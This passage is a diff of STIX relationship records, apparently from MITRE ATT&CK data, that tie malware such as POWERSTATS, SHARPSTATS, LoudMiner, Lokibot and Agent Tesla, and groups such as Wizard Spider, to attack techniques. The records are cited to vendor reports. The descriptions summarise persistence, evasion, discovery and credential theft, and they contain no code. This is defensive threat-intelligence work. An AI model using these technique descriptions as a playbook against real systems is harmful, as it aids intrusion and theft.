+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) has the ability to identify the username on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1567eaca-2b2e-44df-b447-87769738e00a",
+ "type": "relationship",
+ "modified": "2020-05-18T19:37:52.331Z",
+ "created": "2020-05-18T19:37:52.331Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
+ "target_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) has used useless code blocks to counter analysis.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--ee47ad7d-0c85-46fb-a4f7-047fdff09a03",
+ "type": "relationship",
+ "modified": "2020-05-18T19:37:52.336Z",
+ "created": "2020-05-18T19:37:52.336Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+ "target_ref": "tool--3433a9e8-1c47-4320-b9bf-ed449061d1c3",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--baec4c99-f8f9-4789-a73d-c6b652299048",
+ "type": "relationship",
+ "modified": "2020-05-18T19:46:02.154Z",
+ "created": "2020-05-18T19:46:02.154Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+ "target_ref": "tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--649748ff-e2d0-4369-8f5d-3c8b5b5010ed",
+ "type": "relationship",
+ "modified": "2020-05-18T19:46:02.176Z",
+ "created": "2020-05-18T19:46:02.176Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--73c4711b-407a-449d-b269-e3b1531fe7a9",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the domain of the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7c606ccd-2a38-4498-8807-47f00685c203",
+ "type": "relationship",
+ "modified": "2020-05-18T20:04:59.415Z",
+ "created": "2020-05-18T20:04:59.415Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--73c4711b-407a-449d-b269-e3b1531fe7a9",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the username on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f52cb753-6f2f-4f23-834a-75510e8fb47a",
+ "type": "relationship",
+ "modified": "2020-05-18T20:04:59.435Z",
+ "created": "2020-05-18T20:04:59.435Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--73c4711b-407a-449d-b269-e3b1531fe7a9",
+ "target_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the current date and time on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--e0b5c501-c949-4b60-8e2e-37a584dba8fe",
+ "type": "relationship",
+ "modified": "2020-05-18T20:04:59.438Z",
+ "created": "2020-05-18T20:04:59.438Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--73c4711b-407a-449d-b269-e3b1531fe7a9",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to identify the IP address, machine name, and OS of the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--de70abfa-848f-4993-bdb8-7235d4a3d720",
+ "type": "relationship",
+ "modified": "2020-05-18T20:04:59.441Z",
+ "created": "2020-05-18T20:04:59.441Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--73c4711b-407a-449d-b269-e3b1531fe7a9",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to employ a custom PowerShell script.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8e324a04-e543-4eed-bf21-cdf446d8f8f6",
+ "type": "relationship",
+ "modified": "2020-05-18T20:04:59.455Z",
+ "created": "2020-05-18T20:04:59.455Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--73c4711b-407a-449d-b269-e3b1531fe7a9",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[SHARPSTATS](https://attack.mitre.org/software/S0450) has the ability to upload and download files.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8f0afd2b-8cb3-4b5b-b19f-39887602fe95",
+ "type": "relationship",
+ "modified": "2020-05-18T20:04:59.458Z",
+ "created": "2020-05-18T20:04:59.458Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) used a script to gather the IP address of the infected machine before sending to the C2.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--89bd934f-2d0b-487e-9235-138403b91267",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.278Z",
+ "created": "2020-05-18T21:01:51.142Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) used SCP to update the miner from the C2.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8f43b5c3-883a-40b7-b9b2-a96ba8c7001b",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.292Z",
+ "created": "2020-05-18T21:01:51.172Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) can automatically launch at startup if the AutoStart option is enabled in the VBoxVmService configuration file.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8e8a2a1c-3574-417c-95be-d62bb9d8f40a",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.276Z",
+ "created": "2020-05-18T21:01:51.180Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) used a batch script to run the Linux virtual machine as a service.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--e42b5898-2a13-4266-941c-8ef8b8090c8d",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.290Z",
+ "created": "2020-05-18T21:01:51.181Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) started the cryptomining virtual machine as a service on the infected machine.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--94824fdd-25fa-4d23-9220-825f04c4bcc6",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.273Z",
+ "created": "2020-05-18T21:01:51.192Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) has set the attributes of the VirtualBox directory and VBoxVmService parent directory to \"hidden\".(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--533d9f70-6f01-4eed-a198-bf0d29586897",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.280Z",
+ "created": "2020-05-18T21:01:51.343Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) has monitored CPU usage.(Citation: ESET LoudMiner June 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--9e339696-4e81-496f-808e-82d63b62c331",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.287Z",
+ "created": "2020-05-18T21:01:51.346Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) launched the QEMU services in the /Library/LaunchDaemons/ folder using launchctl.(Citation: ESET LoudMiner June 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--131d75f1-84c3-4ef8-b858-7f74aa7ce157",
+ "type": "relationship",
+ "modified": "2020-06-29T23:11:50.937Z",
+ "created": "2020-05-18T21:01:51.371Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) has obfuscated various scripts and encrypted DMG files.(Citation: ESET LoudMiner June 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--2f96597c-70d9-41ba-b019-fb7510d3d732",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.379Z",
+ "created": "2020-05-18T21:01:51.367Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) harvested system resources to mine cryptocurrency, using XMRig to mine Monero.(Citation: ESET LoudMiner June 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--774302ff-3ab9-4328-a434-6188efe0928a",
+ "type": "relationship",
+ "modified": "2020-06-29T23:06:26.175Z",
+ "created": "2020-05-18T21:01:51.374Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) deleted installation files after completion.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--958b9dfc-1c5b-490c-86c5-137e0def493e",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.371Z",
+ "created": "2020-05-18T21:01:51.376Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) used shell scripts to launch various services and to start/stop the QEMU virtualization.(Citation: ESET LoudMiner June 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--55aa08a3-d33a-465b-8d48-d25566ce0957",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.376Z",
+ "created": "2020-05-18T21:01:51.379Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) added plist files in /Library/LaunchDaemons with RunAtLoad set to true.(Citation: ESET LoudMiner June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7398839c-3feb-4162-a3d2-dda8fc2f0375",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.427Z",
+ "created": "2020-05-18T21:01:51.369Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) used the ps command to monitor the running processes on the system.(Citation: ESET LoudMiner June 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--1232c797-ebf4-4036-9ebb-a65fbe8b1443",
+ "type": "relationship",
+ "modified": "2020-06-23T00:48:35.527Z",
+ "created": "2020-05-18T21:01:51.381Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0",
+ "external_references": [
+ {
+ "source_name": "FireEye Ryuk and Trickbot January 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
+ "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used AdFind.exe to collect information about Active Directory organizational units and trust objects.(Citation: FireEye Ryuk and Trickbot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--e2df3e8d-beeb-4592-88f0-0241e321be91",
+ "type": "relationship",
+ "modified": "2020-05-18T21:36:26.102Z",
+ "created": "2020-05-18T21:36:26.102Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
+ "external_references": [
+ {
+ "source_name": "Infoblox Lokibot January 2019",
+ "url": "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22",
+ "description": "Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has used several packing methods for obfuscation.(Citation: Infoblox Lokibot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--0c5577aa-30c5-47f5-83f3-34260860e2b6",
+ "type": "relationship",
+ "modified": "2020-05-18T22:00:40.664Z",
+ "created": "2020-05-18T22:00:40.664Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
+ "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0",
+ "external_references": [
+ {
+ "source_name": "Malwarebytes Agent Tesla April 2020",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
+ "description": "Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020."
+ }
+ ],
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) has the ability to steal credentials from FTP clients and wireless profiles.(Citation: Malwarebytes Agent Tesla April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ae151f0a-374b-47c0-a4e6-b9bdc7ee55b5",
+ "type": "relationship",
+ "modified": "2020-05-20T19:41:37.828Z",
+ "created": "2020-05-19T17:32:26.395Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
